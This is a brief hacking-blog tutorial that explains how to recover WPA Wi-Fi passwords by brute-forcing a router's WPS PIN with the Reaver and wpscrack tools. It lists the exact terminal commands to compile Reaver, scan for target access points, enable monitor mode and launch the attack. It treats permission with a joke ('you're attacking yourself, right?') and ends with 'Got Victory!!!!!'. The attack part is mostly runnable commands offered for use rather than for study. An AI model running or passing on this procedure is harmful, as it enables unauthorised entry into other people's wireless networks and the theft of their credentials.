How to Hack WPA WiFi Passwords by Cracking the WPS PIN Of Wi-Fi Routers

03:52 ---

How to Hack WPA
WiFi Passwords by
Cracking the WPS PIN

Hello Readers
today i am sharing this tutorial
How to Hack WPA
WiFi Passwords by
Cracking the WPS PIN Of Wi-Fi Routers

WPS, or WiFi Protected Setup,
known about for over a year by TNS, was
finally exploited with proof of concept code.
Both TNS, the discoverers of the exploit and
Stefan at .braindump have created their
respective "reaver" and "wpscrack" programs
to exploit the WPS vulnerability. From this
exploit, the WPA password can be recovered
almost instantly in plain-text once the attack
on the access point WPS is initiated, which
normally takes 2-10 hours (depending on
which program you use).

let's go over how to use both
tools to crack WPS. As of yet, no router is safe
from this attack, and yet none of the vendors
have reacted and released firmware with
mitigations in place. Even disabling WPS still
allows this attack on most routers.


•Linux OS

•A router at home with WPS

•The following programs installed (install by
package name): aircrack-ng, python-
pycryptopp, python-scapy, libpcap-dev


(support for all routers)

(faster, but only support for major
router brands)

Crack WPS

bold is a terminal command.

Follow the guide that corresponds to the tool
that you chose to use below.


1. Unzip Reaver.

unzip reaver-1.3.tar.gz

2. Change to the Reaver directory.

cd reaver-1.3

3. Configure, compile and install the application.

./configure && make && sudo make install

4. Scan for an access point to attack, and copy

its MAC address for later

sudo iwlist scan wlan0

5. Set your device into monitor mode.

sudo airmon-ng start wlan0

6. Run the tool against an access point.

reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv

7. Wait until it finishes.
This tool makes it too easy.

wpscrack .py

1. Make the program an executable.

chmod +x

2. Scan for an access point to attack, and copy
its MAC address for later

sudo iwlist scan wlan0

3. Get your MAC address, save it for later.

ip link show wlan0 | awk '/ether/{print $2}'

4. Set your device into monitor mode.

sudo airmon-ng start wlan0

5. Attack your AP. –iface mon0 –client <your MAC,
because you're attacking yourself, right?> –
bssid <AP MAC address> --ssid <name of your
AP> -v

6. Got Victory!!!!!

Now, let's hope we see a lot of firmware
update action going on in the near future, or
else a lot of places are in a whole world of

Thanx For Reading.

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